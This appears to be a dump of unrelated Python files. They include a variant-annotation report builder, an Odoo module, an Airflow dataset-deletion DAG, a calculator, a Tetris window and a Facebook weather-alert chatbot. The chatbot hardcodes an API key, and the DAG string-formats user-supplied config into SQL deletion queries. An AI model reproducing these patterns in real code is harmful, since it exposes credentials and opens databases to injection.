\n # Get variant annotation for identified variant\n if 'civic' in dir_ and 'description' in dir_[database]:\n variant_annotations.append(dir_[database]['description'])\n \n # Get evidence statements if known\n if 'civic' in dir_ and 'evidence_items' in dir_[database]:\n if isinstance(dir_[database]['evidence_items'], list):\n for d in dir_[database]['evidence_items']:\n evidence_items.append(d['description'])\n \n # If short summaries for the mutation not found in 'civic', store 'ann' values instead\n for key, value in dir_.items():\n if isinstance(value, dict) and 'ann' in value.keys():\n info.append((key, value['ann']))\n ann = value['ann']\n gene_ = value['ann']['genename' if isinstance(value['ann'], dict) else 0]\n if isinstance(gene_, dict): gene_ = gene_['genename']\n protein_change_ = value['ann']['effect' if isinstance(value['ann'], dict) else 0]\n if isinstance(protein_change_, dict): protein_change_ = protein_change_['transcript_biotype']\n \n if not len(variant_annotations):\n if isinstance(ann, dict):\n description = 'In database ' + info[0][0] + ' mutation with the gene ID ' + ann['genename'] + ' and Human Genome Variant Society nomenclature ' + ann['hgvs_c'] + ' is found to be ' + ann['effect'] + ' and has a putative impact of ' + ann['putative_impact'] + '.'\n elif isinstance(ann, list):\n description = 'In database ' + info[0][0] + ' mutation with the gene ID ' + ann[0]['genename'] + ' and Human Genome Variant Society nomenclature ' + ann[0]['hgvs_c'] + ' is found to be ' + ann[0]['effect'] + ' and has a putative impact of ' + ann[0]['putative_impact'] + '.'\n \n variant_annotations.append(description)\n\n return variant_annotations, gene_, protein_change_, info, evidence_items\n\n\ndef _add_variant_info(variant_annotations, annotated_variants, gene_, protein_change_, info, v, content, style_, evidence_items, assembly):\n # Add info about variant to the report: Gene Name, Protein Change and Coordinates\n content.append(Paragraph('Clinical Variant ' + str(annotated_variants), style_['Heading2']))\n content.append(Paragraph('Gene Name: ' + '\\t'+ '\\t'+ '\\t' + str(gene_) + '\\n', style_['BodyText']))\n content.append(Paragraph('Protein Change: ' if assembly == 'hg19' else 'Transcript Biotype: ' + '\\t'+ '\\t' + str(protein_change_) + '\\n', style_['BodyText']))\n content.append(Paragraph('Coordinates: ' + '\\t'+ '\\t'+ '\\t' + str(v) + '\\n', style_['BodyText']))\n \n # Make a title for variant annotation section\n content.append(Paragraph('Variant Annotation ', style_['Heading3']))\n \n # Add annotations to the report if found\n if len(variant_annotations):\n for annot in variant_annotations:\n p = Paragraph(str(annot), style_['Justified'])\n content.append(p)\n elif len(info):\n for i in range(len(info)):\n content.append(Paragraph('In database ' + info[i][0] + ' mutation is found to be ' + info[i][1]['effect'] if isinstance(info[i][1], dict) else info[i][1][0]['effect'] + '\\n', style_['Justified']))\n else:\n p = Paragraph('Variant annotation not found...' + '\\n', style_['Justified'])\n content.append(p)\n \n # Put a 'evidence statements' title\n content.append(Paragraph('Evidence Statements ', style_['Heading3']))\n \n # Add evidence statements to the report if found\n if len(evidence_items):\n for i, evidence in enumerate(evidence_items):\n content.append(Paragraph('Evidence statement ' + str(i + 1), style_['Heading4']))\n content.append(Paragraph(str(evidence), style_['Justified']))\n else:\n p = Paragraph('Evidence statements not found...' + '\\n', style_['Justified'])\n content.append(p)\n\n\ndef _add_additional_info(total_variants, annotated_variants, content, style_):\n # Add additional info: processed variants and annotated variants\n content.append(Paragraph('Additional information', style_['Heading3']))\n \n # Give the number of processed variants\n content.append(Paragraph('Total Number of Variants Processed: ' + str(total_variants) + '\\n', style_['BodyText']))\n\n # Give the number of annotated variants\n content.append(Paragraph('The Number of Clinical Annotations: ' + str(annotated_variants) + '\\n', style_['BodyText']))\n\n\ndef getvariant(chromosome, start, ref, var):\n # Create myvariant info instance\n mv = myvariant.MyVariantInfo()\n\n # Get variant information for: chromosome, int(start), ref, var\n v = myvariant.format_hgvs(chromosome, int(start), ref, var)\n dir_ = mv.getvariant(v)\n \n # Return variant information found in all databases as a directory\n return dir_\n\n\ndef annotate_mutations(file, assembly = 'hg19'):\n # Open variant file with pandas\n identified_variants = pd.read_csv(file, sep='\\t')\n \n # Give a name to the output file: 'test_filename' + '_AIM_report.pdf'\n doc_name = file.split('.')[0] + '_AIV_Report.pdf'\n \n # Create a sample document and sample style sheet\n report = SimpleDocTemplate(doc_name)\n style_ = getSampleStyleSheet()\n \n # Add a paragraph style to justify text\n style_.add(ParagraphStyle('Justified', alignment=TA_JUSTIFY))\n \n # Create a list to store all the content which will be written into the report\n content = []\n\n # Put main title of the annotation report\n content.append(Paragraph(\"Annotation of Identified Variants\", style_['Heading1']))\n \n # Add given input file name\n content.append(Paragraph('File Name: ' + '\\t' + '\\t' + '\\t' + str(file) + '\\n', style_['BodyText']))\n\n # Get a myvariant info instance\n mv = myvariant.MyVariantInfo()\n\n # Initiliaze a counter for variants\n total_variants = 0\n annotated_variants = 0\n\n # Loop through identified variants and get annotations\n for i, row in identified_variants.iterrows():\n # Store the total number of variants given in the input file\n total_variants +=1\n \n # Get chromosome, start, reference and variant columns\n chrom_ = row['Chromosome']\n start_ = row['Start']\n ref_ = row['Ref']\n var_ = row['Var']\n \n # Get variant information\n v = myvariant.format_hgvs(chrom_, int(start_), ref_, var_)\n dir_ = mv.getvariant(v, assembly=assembly)\n\n # Get data from 'civic'\n if dir_:\n # Create an empty list to store annotations\n variant_annotations, gene_, protein_change_, info, evidence_items = _pull_data(dir_, 'civic')\n \n # Increase the number of clinically annotated variants by 1 (one).\n annotated_variants +=1\n \n # Add content to the report: general info, annotations & evidence statements\n _add_variant_info(variant_annotations, annotated_variants, gene_, protein_change_, info, v, content, style_, evidence_items, assembly)\n \n \n # Add processing information: total processed variants and number of annotated variants\n _add_additional_info(total_variants, annotated_variants, content, style_)\n\n # Save report in the same directory\n report.build(content)\n","sub_path":"build/lib/aiv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"160032306","text":"from model.contact import Contact\nimport random\nimport string\nimport os.path\nimport jsonpickle\nimport getopt\nimport sys\n\ntry:\n opts,args = getopt.getopt(sys.argv[1:], \"n:f:\", [\"number of contacts\", \"file\"])\nexcept getopt.GetoptErroras as err:\n getopt.usage()\n sys.exit(2)\n\nn = 5\nf = \"data/contacts.json\"\n\nfor o, a in opts:\n if o == \"-n\":\n n = int(a)\n elif o == \"-f\":\n f = a\n\ndef random_string(prefix, maxleng):\n symbols = string.ascii_letters + string.digits\n return prefix + \"\".join([random.choice(symbols) for i in range(random.randrange(maxleng))])\n\ntestdata = [Contact(firstname=\"\", lastname=\"\", address=\"\", homephone=\"\", mobilephone=\"\", workphone=\"\", phone=\"\",\n mail1=\"\", mail2=\"\", mail3=\"\")] + \\\n[\n Contact(firstname=random_string(\"firstname\", 12), lastname=random_string(\"lastname\", 12),\naddress=random_string(\"firstname\", 12), homephone=random_string(\"homephone\", 7), mobilephone=random_string(\"mobilephone\", 12),\nworkphone=random_string(\"workphone\", 12), phone=random_string(\"phone\", 12), mail1=random_string(\"mail1\", 12),\nmail2=random_string(\"mail2\", 12), mail3=random_string(\"mail3\", 12),)\n for i in range(n)\n]\n\nfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", f)\n\nwith open(file, \"w\") as out:\n jsonpickle.set_encoder_options(\"json\", indent=2)\n out.write(jsonpickle.encode(testdata))","sub_path":"generator/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"253924476","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n def write(self, vals):\n if not vals.get('active', True):\n self.env['mrp.bom'].sudo().search([('product_tmpl_id', 'in', self.ids)]).write({'active': False})\n return super(ProductTemplate, self).write(vals)\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n def name_get(self):\n result = super(ProductProduct, self).name_get()\n\n archived_product_ids = self.filtered(lambda rec: not rec.active).ids\n for i, rec in enumerate(result):\n if rec[0] in archived_product_ids and 'ARCV:' not in rec[1]:\n result[i] = (rec[0], \"ARCV: %s\" % rec[1])\n\n return result\n\n def write(self, vals):\n if not vals.get('active', True):\n product_available = self._product_available()\n for product in self:\n if product_available.get(product.id, {}).get('qty_available', 0):\n raise UserError(\"Action cannot be performed as Product %s has stock available.\" % (product.display_name))\n\n self.mapped('orderpoint_ids').write({'active': False})\n self.env['mrp.bom'].sudo().search([('product_id', 'in', self.ids)]).write({'active': False})\n\n return super(ProductProduct, self).write(vals)\n\n def unlink(self):\n self.env['mrp.bom'].sudo().search([('product_id', 'in', self.ids)]).write({'active': False})\n return super(ProductProduct, self).unlink()\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"product_archive/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631421130","text":"# /usr/bin/env python3\n# -*- coding: utf-8 -*-\n# A commandline based four function calculator.\nfrom re import split\n\nprint(\"A simple four function calculator\\n\")\nprint(\"Type \\\"quit\\\" or \\\"exit\\\" to quit.\")\nprint(\"Operators are: +, -, *, and /\\n\")\n\ndef add(x, y: int):\n \"\"\"\n :type x: int\n :type y: int\n \"\"\"\n return x+y\n\n\ndef sub(x, y: int):\n \"\"\"\n :type x: int\n :type y: int\n \"\"\"\n return x-y\n\n\ndef mul(x, y: int):\n \"\"\"\n :type x: int\n :type y: int\n \"\"\"\n return x*y\n\n\ndef div(x, y: int):\n \"\"\"\n :type x: int\n :type y: int\n \"\"\"\n if y == 0:\n print(\"Division by zero. Result undefined!\")\n return 0\n return x/y\n\n\nwhile True:\n exp = input(\"> \")\n\n if exp == \"quit\":\n break\n elif exp == \"exit\":\n break\n\n print(\"expression: \" + exp)\n\n if \"+\" in exp:\n # print(\"Addition!\")\n a, b = split('\\+', exp)\n print(add(int(a), int(b)))\n elif \"-\" in exp:\n # print(\"Subtraction!\")\n a, b = split('-', exp)\n print(sub(int(a), int(b)))\n elif \"*\" in exp:\n # print(\"Multiplication!\")\n a, b = split('\\*', exp)\n print(mul(int(a), int(b)))\n elif \"/\" in exp:\n # print(\"Division!\")\n a, b = split('\\/', exp)\n print(int(div(int(a), int(b))))\n","sub_path":"calc/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"228495168","text":"\"\"\"\n二进制求和\n\n给你两个二进制字符串,返回它们的和(用二进制表示)。\n\n输入为 非空 字符串且只包含数字 1 和 0。\n\n例如:\n”11“ + ”1“ = ”100“\n\"\"\"\n\n\nclass Solution:\n def addBinary(self, a, b):\n\n p1 = len(a) - 1\n p2 = len(b) - 1\n add = 0\n result = []\n while p1 >= 0 or p2 >= 0:\n val = 0\n if p1 >= 0:\n val += int(a[p1])\n p1 -= 1\n if p2 >= 0:\n val += int(b[p2])\n p2 -= 1\n val += add\n add = val // 2\n result.append(str(val % 2))\n\n if add > 0:\n result.append(str(add))\n return \"\".join(result[::-1])\n\n\nif __name__ == '__main__':\n s = Solution()\n assert (s.addBinary(\"11\", \"1\") == \"100\")\n","sub_path":"string/67.二进制求和.py","file_name":"67.二进制求和.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"467838196","text":"\"\"\"\n# Delete selected version of datasets (Self Serve)\n\nThis DAG should be triggered manually and will:\n\n- delete selected datasets matching condition: product_name='something', version='2.5.0', sensor='landsat-8'\n\n## Note\nAll list of utility dags here: https://github.com/GeoscienceAustralia/dea-airflow/tree/develop/dags/deletion, see Readme\n\n## Customisation\n\nThere are three configuration arguments:\n\n- `product_name`\n- `version`\n- `sensor`\n\nThe tasks steps in this dag which are executed are:\n\n1. pre-check there is dataset for deletion for the given product with the condition, if no dataset found this dag will fail\n2. execute the deletion\n3. confirm deletion successed, if dataset are still found, this dag will fail\n\n\n### Sample Configuration\n {\n \"product_name\": \"ga_ls_fc_3\",\n \"version\": \"2.5.0\"\n \"sensor\": \"landsat-8\"\n }\n\n## for local integration testing testing\n\n```\n docker-compose -f docker-compose.workflow.yaml run airflow-worker \\\n airflow dags trigger --conf '{\"product_name\": \"ga_ls7e_ard_provisional_3\", \"version\": \"3.2.0\", \"sensor\": \"landsat-7\"}' deletion_utility_datasets_version_sensor\n\n```\n\"\"\"\n\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nfrom airflow.operators.python import PythonOperator\n\nfrom infra.connections import DB_ODC_READER_CONN, DB_ODC_WRITER_CONN\nfrom airflow.exceptions import AirflowException\nfrom deletion.deletion_sql_queries import (\n DATASET_COUNT_BY_ANY_CLAUSE,\n)\n\n\nDAG_NAME = \"deletion_utility_datasets_version_sensor\"\n\nDEFAULT_ARGS = {\n \"owner\": \"Emma Ai\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2022, 3, 10),\n \"email\": [\"emma.ai@ga.gov.au\"],\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=5),\n}\n\nversion = \"{{ dag_run.conf.version }}\"\nsensor = \"{{ dag_run.conf.sensor }}\"\n\nSQL_WHERE_CLAUSE = \"\"\"\n (ds.metadata -> 'properties' ->> 'odc:dataset_version' = '%s')\n and (ds.metadata -> 'properties' ->> 'eo:platform' = '%s')\n \"\"\" % (\n version,\n sensor,\n)\n\n\ndef count_datasets(product_name=\"\", where_clause=\"\", after_delete=False, **kwargs):\n \"\"\"\n Check if datasets exist, and\n Count no. datasets\n after_delete: True/False indicates the results after/before deletion\n \"\"\"\n query_string = DATASET_COUNT_BY_ANY_CLAUSE.format(\n product_name=product_name, clause=where_clause\n )\n\n print(query_string)\n pg_hook = PostgresHook(postgres_conn_id=DB_ODC_READER_CONN)\n connection = pg_hook.get_conn()\n cursor = connection.cursor()\n cursor.execute(query_string)\n result = cursor.fetchone()\n if not result or result[0] == 0:\n if not after_delete:\n raise AirflowException(\n \"No dataset in %s satisfies %s\" % (product_name, where_clause)\n ) # mark it failed\n else:\n print(\"No dataset found, deletion has successfully completed\")\n return True\n\n else:\n if not after_delete:\n print(\n f\"{result[0]} datasets of product {product_name} with {where_clause} can be deleted\"\n )\n return True\n else:\n raise AirflowException(\n f\"{result[0]} datasets of product {product_name} with {where_clause} remaining, deletion failed\"\n )\n\n\ndef delete_selected_datasets(product_name=\"\", where_clause=\"\", **kwargs):\n \"\"\"\n Delete the datasets of product_name by where_clause\n \"\"\"\n pg_hook = PostgresHook(postgres_conn_id=DB_ODC_WRITER_CONN)\n sql = kwargs[\"templates_dict\"][\"sql\"]\n query_string = sql.format(product_name=product_name, clause=where_clause)\n pg_hook.run(query_string)\n\n\n# THE DAG\ndag = DAG(\n dag_id=DAG_NAME,\n doc_md=__doc__,\n default_args=DEFAULT_ARGS,\n schedule_interval=None,\n catchup=False,\n tags=[\n \"k8s\",\n \"self-service\",\n \"datasets-deletion\",\n \"deletion\",\n ],\n)\n\nwith dag:\n\n branchop = PythonOperator(\n task_id=\"count_datasets_before_delete\",\n python_callable=count_datasets,\n op_kwargs={\n \"product_name\": \"{{ dag_run.conf.product_name }}\",\n \"where_clause\": SQL_WHERE_CLAUSE,\n \"after_delete\": False,\n },\n )\n\n delete_selected_datasets = PythonOperator(\n task_id=\"delete_selected_datasets\",\n python_callable=delete_selected_datasets,\n op_kwargs={\n \"product_name\": \"{{ dag_run.conf.product_name }}\",\n \"where_clause\": SQL_WHERE_CLAUSE,\n },\n templates_dict={\"sql\": \"deletion_sql/delete_datasets_wild_card.sql\"},\n templates_exts=(\".sql\",),\n )\n\n execution_status_reporter = PythonOperator(\n task_id=\"count_datasets_after_delete\",\n python_callable=count_datasets,\n op_kwargs={\n \"product_name\": \"{{ dag_run.conf.product_name }}\",\n \"where_clause\": SQL_WHERE_CLAUSE,\n \"after_delete\": True,\n },\n )\n\n branchop >> delete_selected_datasets >> execution_status_reporter\n","sub_path":"dags/deletion/utility_delete_selected_version_datasets.py","file_name":"utility_delete_selected_version_datasets.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"233092942","text":"from .Technion_Request import *\nfrom .Huji_Request import *\nfrom .Tlv_Request import *\nfrom .Beer_Sheva_Request import *\nfrom .Profs import *\n\n\na = Prof('אזרחות',5,90)\nb = Prof('אנגלית', 5, 80)\nc = Prof('הבעה עברית', 5, 80)\nd = Prof('הסטוריה', 5, 80)\ne = Prof('מתמטיקה', 5, 80)\nf = Prof('ספרות', 5, 80)\ng = Prof('תנ\"ך', 5, 94)\nlistp = [a,b,c,d,e,f,g]\n\nclass Generate:\n\n def __init__(self, profs_list, psycho):\n self.profs = profs_list\n self.psycho = psycho\n\ndef main(profs_list,psycho):\n technion_results=Technion_Request(profs_list, psycho)\n huji_results=Huji_Request(profs_list, psycho)\n tlv_results=Tlv_Request(profs_list,psycho)\n bgu_results=Beer_Sheva_Request(profs_list,psycho)\n all_results=[technion_results,huji_results,tlv_results,bgu_results]\n\n return(all_results)\n\ndef parse_modle_1_request(user_input:dict):\n proof_list = []\n for key in user_input:\n proof_list.append(Prof(key, user_input[key][0], user_input[key][1]))\n return proof_list\n\n\n\n","sub_path":"Tziunim_server/Run_Requests.py","file_name":"Run_Requests.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498360184","text":"import pygame\n\nfrom tetris.graphics.board import Board\nfrom tetris.graphics.score import Score\n\n\nclass Window:\n WIDTH = 300\n HEIGHT = 700\n\n def __init__(self):\n pygame.init()\n self.window = pygame.display.set_mode((Window.WIDTH, Window.HEIGHT))\n self.board = Board(self.window)\n self.score = Score(self.window)\n\n def draw(self, board, score):\n self._clear()\n self.board.draw(board)\n self.score.draw(score)\n pygame.display.flip()\n \n def _clear(self):\n pygame.draw.rect(self.window, pygame.Color(\"black\"), pygame.Rect(0, 0, Window.WIDTH, Window.HEIGHT))\n","sub_path":"src/main/tetris/graphics/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"39388974","text":"from cgi import log\r\nimport threading\r\nimport requests\r\nimport random\r\nfrom fbchat import Client, log\r\nfrom fbchat.models import *\r\n\r\nclient = Client(\"email\", \"pass\")\r\nif not client.isLoggedIn():\r\n client = Client(\"email\", \"pass\")\r\n\r\nalreadyDone = False\r\n\r\n\r\n\r\ndef reset():\r\n global alreadyDone\r\n alreadyDone = False\r\n\r\n\r\ndef set_interval(func, sec):\r\n def func_wrapper():\r\n set_interval(func, sec)\r\n func()\r\n\r\n t = threading.Timer(sec, func_wrapper)\r\n t.start()\r\n return t\r\n\r\n\r\ndef isTrue():\r\n\r\n global alreadyDone\r\n if check() == \"1\" and alreadyDone is False:\r\n client.send(Message(text='UPDATE: Wind speed is between 30-60kph. \\n '\r\n 'Intermittent rains may be expected in at least 36 hours. '\r\n '(When the tropical cyclone develops very close to an area, '\r\n 'a shorter lead time of the occurrence of the winds will be '\r\n 'specified in the warning bulletin.) There is a possibility that '\r\n 'the Storm warning signal will be raised if the storm moves closer to '\r\n 'land '\r\n '*WAIT FOR SUSPENSION FOR CLASSES, THIS IS NOT A OFFICIAL WARNING SIGNAL.* \\n'\r\n '-Powered by DarkSky Weather API.'),\r\n thread_id=\"2695213210490883\",\r\n thread_type=ThreadType.GROUP)\r\n\r\n alreadyDone = True\r\n elif check() == \"2\" and alreadyDone is False:\r\n client.send(Message(text='UPDATE: Wind speed is now between 61 - 120kph. \\n '\r\n 'Light to moderate damage. '\r\n 'Winds of greater than 60 kph and up to 100 kph may be expected in at least 24 hours. '\r\n 'Special attention should be given to the latest position, direction and movement '\r\n 'speed, '\r\n 'and intensity of the storm as it moves toward an area.'\r\n 'The public especially people traveling by sea and air are cautioned.'\r\n 'Outdoor activities of children should be postponed.'\r\n 'Secure properties before the signal is upgraded.'\r\n 'Disaster preparedness agencies/organizations are in action to alert'\r\n ' their communities.'\r\n '*WAIT FOR SUSPENSION FOR CLASSES, THIS IS NOT A OFFICIAL WARNING SIGNAL.* \\n'\r\n '-Powered by DarkSky Weather API.'),\r\n thread_id=\"2695213210490883\",\r\n thread_type=ThreadType.GROUP)\r\n\r\n alreadyDone = True\r\n elif check() == \"3\" and alreadyDone is False:\r\n client.send(Message(text='UPDATE: Winds of greater than 100 kph up to 185 kph'\r\n ' may be expected in at least 18 hours. \\n '\r\n 'Travel is very risky especially by air and sea.'\r\n 'People are advised to seek shelter in strong '\r\n 'buildings, '\r\n 'evacuate low-lying areas, and stay away from the coasts and riverbanks.'\r\n 'Watch out for the passage of the eye of the typhoon indicated by a sudden occurrence'\r\n ' of fair weather immediately after very bad weather, '\r\n 'with very strong winds coming generally from the north.'\r\n 'When the eye of the typhoon hit the community, '\r\n 'do not venture away from the safe shelter because after one'\r\n ' to two hours, the worst weather will resume,'\r\n ' with the very strong winds coming from the south.'\r\n 'Classes in all levels should be suspended and '\r\n 'children should stay in the safety of strong buildings.'\r\n 'Disaster preparedness and response agencies/organizations are in action with '\r\n 'appropriate response to emergency. '\r\n '*WAIT FOR SUSPENSION FOR CLASSES, THIS IS NOT A OFFICIAL WARNING SIGNAL.* \\n'\r\n '-Powered by DarkSky Weather API.'),\r\n thread_id=\"2695213210490883\",\r\n thread_type=ThreadType.GROUP)\r\n\r\n alreadyDone = True\r\n elif check() == 4 and alreadyDone is False:\r\n client.send(\r\n Message(text='UPDATE: Very strong winds of more than 185 kph may be expected in at least 12 hours. \\n '\r\n 'The situation is potentially very destructive to the community. '\r\n 'The area is very likely to be hit directly by the eye of the typhoon. '\r\n 'As the eye of the typhoon approaches, the weather will worsen continuously, with winds'\r\n ' increasing to its strongest coming generally from the north. '\r\n 'A sudden improvement of the weather with light winds will be experienced, which means the area is under the eye of the typhoon. '\r\n 'Depending on the eye’s diameter and movement speed, this improved weather may last for an hour or two. '\r\n 'As the eye moves out of the area, weather conditions will worsen, with strong winds generally coming from the south.'\r\n '*DONT GO TO SCHOOL TODAY* \\n'\r\n '-Powered by DarkSky Weather API.'),\r\n thread_id=\"2695213210490883\",\r\n thread_type=ThreadType.GROUP)\r\n\r\n alreadyDone = True\r\n elif check() == 5 and alreadyDone is False:\r\n client.send(Message(text='UPDATE: Wind speed can reach over 220kph. \\n '\r\n 'Stay safe, i dont know what ill say to you, but please stay safe, dont go outside.'\r\n '*DONT GO TO SCHOOL TODAY.* \\n'\r\n '-Powered by DarkSky Weather API.'),\r\n thread_id=\"2695213210490883\",\r\n thread_type=ThreadType.GROUP)\r\n\r\n alreadyDone = True\r\n elif check() == \"no\" and alreadyDone is True:\r\n\r\n alreadyDone = False\r\n\r\n\r\ndef check():\r\n i = requests.get(\"https://api.darksky.net/forecast/b2f13b2632333395c57e9dbb5f082cda/14.8528, 120.8154\")\r\n data = i.json()\r\n\r\n for key, value in dict.items(data):\r\n if key != \"currently\":\r\n pass\r\n else:\r\n a = value\r\n val = int(a['windSpeed'])\r\n if 30 <= val <= 60:\r\n return \"1\"\r\n elif 61 <= val <= 120:\r\n return \"2\"\r\n elif 121 <= val <= 170:\r\n return \"3\"\r\n elif 171 <= val <= 220:\r\n return \"4\"\r\n elif val > 220:\r\n return \"4\"\r\n else:\r\n return \"no\"\r\n\r\n isTrue()\r\n reset()\r\n\r\n\r\nclass punkjj(Client):\r\n def onMessage(self, author_id=None, message_object=None, thread_id=None, thread_type=ThreadType.USER, **kwargs):\r\n toggle = client.fetchThreadMessages(thread_id=client.uid, limit=1) # client.uid means its our own acc\r\n for message in toggle:\r\n pText = message.text.lower()\r\n if (\"online\" in pText):\r\n self.markAsRead(author_id)\r\n log.info(\"Message {} from {} in {}\".format(message_object, thread_id, thread_type))\r\n msgText = message_object.text.lower()\r\n\r\n if msgText == \"say hello, delpi bot!\" or msgText == \"say hi to them, delpi bot! \":\r\n client.send(Message(text=\"Hello! I am delpi bot, created and managed by \"\r\n \"@Jam Emmanuel Arevalo Villarosa, written in \"\r\n \"python, using the \"\r\n \"python FBChat API! I am currently in progress, \"\r\n \"i would appreciate it if you all could give \"\r\n \"suggestions as to what i can do, thank you! :)\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif msgText == \"tell me the weather today\" or msgText == \"whats the weather like today?\" or msgText == \"tell me the weather\" or msgText == \"\":\r\n i = requests.get(\"https://api.darksky.net/forecast/b2f13b2632333395c57e9dbb5f082cda/14.8528, 120.8154\")\r\n data = i.json()\r\n for key, value in dict.items(data):\r\n if key != \"currently\":\r\n pass\r\n else:\r\n a = value\r\n val = str(a['windSpeed'])\r\n t = round(int((a[\"temperature\"]) - 32) / 1.8)\r\n temp = str(round(int((a[\"temperature\"]) - 32) / 1.8))\r\n precipProb = str(a['precipProbability'])\r\n if 30 <= t <= 32:\r\n client.sendRemoteImage(\r\n \"https://scontent.fmnl8-1.fna.fbcdn.net/v/t1.15752-0/p280x\"\r\n \"280/88225254_655687121857925_6008140458004316160_n.png?_nc\"\r\n \"_cat=107&_nc_sid=b96e70&_nc_ohc=_6zpM_NdEu0AX9pxo1N&_nc_ht=\"\r\n \"scontent.fmnl8-1.fna&oh=24fd7c985f65333a985eed448c22aab9&oe=5EFCD9D3\",\r\n message=Message(text=\"What's the weather like today?\\n\"\r\n + \"*OVERCAST*\\n\" +\r\n \"Wind Speed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's getting hot!\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type,\r\n )\r\n\r\n elif 31 <= t <= 35:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's getting REALLY hot! Make sure to drink water!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif t <= 30:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"Normal temperature!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 20 <= t <= 25:\r\n client.send(Message(text=\"What's the weather like today?\\n \"\r\n + \"*OVERCAST*\\n\" +\r\n \"Windspeed: \" + val + \"\\n\" +\r\n \"Rain probability: \" + precipProb + \"\\n\" +\r\n \"Temperature (C): \" + temp + \"°C \\n\"\r\n + \"It's so cold today!\"\r\n ),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif msgText == \"am i a dumbbell\" or msgText == \"dumbbell ba ako\":\r\n rand = random.randrange(1, 100)\r\n if 1 < rand < 15:\r\n client.send(Message(\r\n text=\"Pare isa ka sa mga pinaka-malaking dumbbell sa lahat, sorry to tell you the truth.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 15 < rand < 25:\r\n client.send(Message(\r\n text=\"Pabigat ka, pero hindi ka sobrang pabigat.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 25 < rand < 50:\r\n client.send(Message(\r\n text=\"Nagiging dumbbell ka kapag malungkot or pagod.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 50 < rand < 75:\r\n client.send(Message(\r\n text=\"Dumbbell ka talaga, pero kapag tinatamad ka lang.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 75 < rand < 80:\r\n client.send(Message(\r\n text=\"Dumbbell ka, pero nakakabawi pa rin.\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n elif 80 < rand < 100:\r\n client.send(Message(\r\n text=\"It's your lucky day! Hindi ka dumbbell!\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n\r\n elif msgText == \"ano commands\" or \"ano commands nung bot\" in msgText:\r\n client.send(Message(\r\n text=\"COMMANDS:\\n\"\r\n \"weather: just say 'tell me the weather today.'\\n\"\r\n \"\"\r\n \"\"\r\n \"dumbbell-o-meter: just say 'dumbbell ba ako?'\\n\"\r\n \"More explanation of the features @ : https://pastebin.com/6yUEA0sR\"),\r\n thread_id=thread_id,\r\n thread_type=thread_type)\r\n\r\n\r\n\r\n def sendMsgg():\r\n if author_id != self.uid:\r\n self.send(Message(text=\"Hello!\"), thread_id=thread_id, thread_type=thread_type)\r\n self.markAsDelivered(author_id, thread_id)\r\n\r\n if \"online\" in pText:\r\n sendMsgg()\r\n\r\n\r\n# ####################################################################\r\n# Assigning values\r\n\r\n\r\nset_interval(check, 18000)\r\nclient1 = punkjj(\"email\", \"pass\")\r\nclient1.listen()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48777673","text":"import pandas as pd\n\n# carregamento da base\ndata_cancer = pd.read_csv('dataset/cancer_data.csv')\n\n# pré processamento da base\nX = data_cancer.drop(columns=['Unnamed: 32', 'id', 'diagnosis']) \ny = data_cancer['diagnosis'].values\n\nfrom sklearn.preprocessing import LabelEncoder\n\ny_converted = y\n\nl_enc = 